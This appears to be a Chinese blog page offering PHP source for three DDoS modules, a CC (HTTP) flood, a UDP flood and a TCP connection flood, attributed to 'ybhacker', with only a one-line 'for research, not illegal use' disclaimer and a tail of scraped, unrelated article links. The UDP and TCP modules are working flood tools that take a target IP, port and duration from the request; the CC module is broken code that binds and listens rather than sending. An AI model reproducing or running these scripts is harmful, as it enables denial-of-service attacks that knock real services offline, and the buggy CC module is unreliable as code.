PHP DDOS的UDP攻击,TCP攻击,和CC攻击的核心代码
网络安全向,请勿用作非法用途
CC攻击模块:
<?php
echo “状态 : 正常运行中…..<br>”;
echo “================================================<br>”;
echo ” <font color=blue>www.phpddos.com<br>”;
echo ” CC Flood 模块<br>”;
echo ” 作者:ybhacker<br>”;
echo ” 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>”;
echo “================================================<br><br>”;
error_reporting(E_ALL); //提示错误信息
set_time_limit(0); //设定一个程式所允许执行的秒数 0 是无限循环
ob_implicit_flush(); // 刷新输出缓冲
$address = $_POST[‘site’]; // 网站地址
$port = $_POST[‘port’]; // 端口
$dongu = $_POST[‘dongu’]; //循环次数
$sayi = 1;
while ( $sayi <= $dongu ) //变量asyi小于 循环次数变量 dongu 才会继续循环
{
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false) {
echo “HaHa\n”;
}
if (socket_bind($sock, $address, $port) === false) { // 连接端口
echo “HaHa\n”;
}
if (socket_listen($sock, 5) === false) {
echo “HaHa\n”;
}
$msg = “HTTP/1.1 GET /\r\nHost:”+$_GET[‘site’]+”\r\nConnection: Keep-Alive\r\n”;
socket_write($msg);
socket_close($sock);
$sayi++; // 循环一次 变量sayi 加1
echo “Goodbye…”.$sayi; // 输出循环次数
}
?>
UDP攻击模块:
<?php
$packets = 0;
$ip = $_GET[‘ip’];
$port = $_GET[‘port’];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[‘time’];
$time = time();
print “状态 : 正常运行中…..<br>”;
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= “phpddos”;
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(“udp://$ip”, $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo “================================================<br>”;
echo ” <font color=blue>www.phpddos.com<br>”;
echo ” 作者:ybhacker<br>”;
echo ” 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>”;
echo “================================================<br><br>”;
echo ” 攻击包总数:<font color=Red><span class=\”text\”>”.$packets.” 个数据包</span><br><br></font>”;
echo ” 攻击总流量:<font color=Red><span class=\”text\”>”.round(($packets*65*8)/(1024*1024),2).” Mbps</span><br><br></font>”;
echo ” 攻击总字节:<font color=Red><span class=\”text\”>”.time(‘h:i:s’).” 字节</span><br><br></font>”;
echo “Packet complete at “.time(‘h:i:s’).” with $packets (” .round(($packets*65*8)/(1024*1024),2). ” Mbps) packets averaging “. round($packets/$exec_time, 2) . ” packets/s \n”;
?>
TCP攻击模块:
<?php
ini_set(“display_errors”, “Off”);
$packets = 0;
$ip = $_GET[‘ip’];
$port = $_GET[‘port’];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[‘time’];
$time = time();
print “状态 : 正常运行中…..<br>”;
$max_time = $time+$exec_time;
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(“tcp://$ip”, $port,$errno,$errstr,0);
}
echo “================================================<br>”;
echo ” <font color=blue>www.phpddos.com<br>”;
echo ” SYN Flood 模块<br>”;
echo ” 作者:ybhacker<br>”;
echo ” 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>”;
echo “================================================<br><br>”;
echo ” 攻击包总数:<font color=Red><span class=\”text\”>”.$packets.” 个数据包</span><br><br></font>”;
echo ” 攻击总流量:<font color=Red><span class=\”text\”>”.round(($packets*65*8)/(1024*1024),2).” Mbps</span><br><br></font>”;
echo ” 攻击总字节:<font color=Red><span class=\”text\”>”.time(‘h:i:s’).” 字节</span><br><br></font>”;
echo “Packet complete at “.time(‘h:i:s’).” with $packets (” .round(($packets*65*8)/(1024*1024),2). ” Mbps) packets averaging “. round($packets/$exec_time, 2) . ” packets/s \n”;
?>
PHP DDOS的UDP攻击,TCP攻击,和CC攻击的核心代码的更多相关文章
- DDoS攻防战(二):CC攻击工具实现与防御理论
我们将要实现一个进行应用层DDoS攻击的工具,综合考虑,CC攻击方式是最佳选择,并用bash shell脚本来快速实现并验证这一工具,并在最后,讨论如何防御来自应用层的DDoS攻击. 第一步:获取大量 ...
- DDoS攻防战 (二) :CC攻击工具实现与防御理论
故上兵伐谋 其次伐交 其次伐兵 其下攻城 攻城之法 为不得已 知己知彼 百战不殆 不知彼而知己 一胜一负 不知彼不知己 每战必败 ——孙子兵法·谋攻 我们将要实现一个进行应用层DDoS攻击的工具,综合 ...
- DDoS攻防战(二):CC攻击工具实现与防御理论--删除
我们将要实现一个进行应用层DDoS攻击的工具,综合考虑,CC攻击方式是最佳选择,并用bash shell脚本来快速实现并验证这一工具,并在最后,讨论如何防御来自应用层的DDoS攻击. 第一步:获取大量 ...
- DDoS攻防战 (四):CC攻击防御系统部署
1. 系统效果 此DDOS应用层防御系统已经部署在了http://www.yfdc.org网站上(如果访问失败,请直接访问位于国内的服务器http://121.42.45.55进行在线测试). 此防御 ...
- ddos cc攻击简单介绍(转)
何为syn flood攻击: SYN Flood是一种广为人知的DoS(拒绝服务攻击)是DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻 ...
- CC攻击与DDOS攻击区别
二者的攻击方式主要分为三种:直接攻击.代理攻击.僵尸网络攻击 CC攻击是DDOS(分布式拒绝服务)的一种,相比其它的DDOS攻击CC似乎更有技术含量一些.这种攻击你见不到虚假IP,见不到特别大的异常流 ...
- linux中防CC攻击两种实现方法(转)
CC攻击就是说攻击者利用服务器或代理服务器指向被攻击的主机,然后模仿DDOS,和伪装方法网站,这种CC主要是用来攻击页面的,导致系统性能用完而主机挂掉了,下面我们来看linux中防CC攻击方法. 什么 ...
- 什么是CC攻击,如何防止网站被CC攻击的方法总汇
CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,也是一种常见的网站攻击方法,攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包,造成对方服务器资源耗尽,一 ...
- 浅谈iptables防SYN Flood攻击和CC攻击
------------------------本文为自己实践所总结,概念性的东西不全,这里粗劣提下而已,网上很多,本文主要说下目前较流行的syn洪水攻击和cc攻击------------------ ...
- 网站防止CC攻击的方法
CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,也是一种常见的网站攻击方法,攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包,造成对方服务器资源耗尽,一 ...
随机推荐
- 8月10日CSS总结
1.三角形光标转换 CSS: .one{ width: 0; height: 0; border-top: 100px solid #000; border-right:100px solid t ...
- API(三)之Class-based Views
使用基于类的视图重写API 我们首先将根视图重写为基于类的视图.所有这一切都涉及到重构views.py. from snippets.models import Snippet from snippe ...
- HDU5988/nowcoder 207G - Coding Contest - [最小费用最大流]
题目链接:https://www.nowcoder.com/acm/contest/207/G 题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=5988 ...
- 微信小程序image组件中aspectFill和widthfix模式应用详解
aspectFill 与 widthfix 都是保持宽高比不变 aspectFill 保持纵横比缩放图片,只保证图片的短边能完全显示出来.也就是说,图片通常只在水平或垂直方向是完整的,另一个方向将会发 ...
- day0315 迭代器
一. 迭代器 1.什么是可迭代器? 除了数字和布尔值之外,其他数据类型都是可迭代对象.(字符串,列表,元组,字典,集合) 2.可迭代协议 2.1 可以被迭代要满足的要求就叫可迭代协议,可迭代的定义非常 ...
- Xcode编译警告Assigning to 'id<XXXDelegat> ——Nullable' from incompatible type 'XXXView *const_strong'
编译报警告 可能是 自定义分类使用协议时出现与父类协议的冲突 解决方法如下:
- 约数,gcd,exgcd.
很多题都是要求出什么最大公约数或者最小公倍数什么的,也有一些题目是和约数个数有关的,所以需要总结一下. 首先最大公约数和最小公倍数怎么求呢? 当然是观察法了,对于一些很聪明的孩纸他们一般随便一看就秒出 ...
- es6学习笔记入门总结
1.let const block 作用域 let 代替var 来声明块级作用域,没有变量提升,只在块内有作用 const 可以声明一个常量,类似于指针,指向某一个引用,这个常量并非一成不变的,但是不 ...
- falsk 与 django cookie和session存、取、删的区别
falsk cookie的存取删需导入from flask import Flask,make_response,request# 存COOKIE的方法@app.route('/setcookie') ...
- GBDT原理学习
首先推荐 刘建平 的博客学习算法原理推导,这位老师的讲解都很详细,不过GBDT的原理讲解我没看明白, 而是1.先看的https://blog.csdn.net/zpalyq110/article/de ...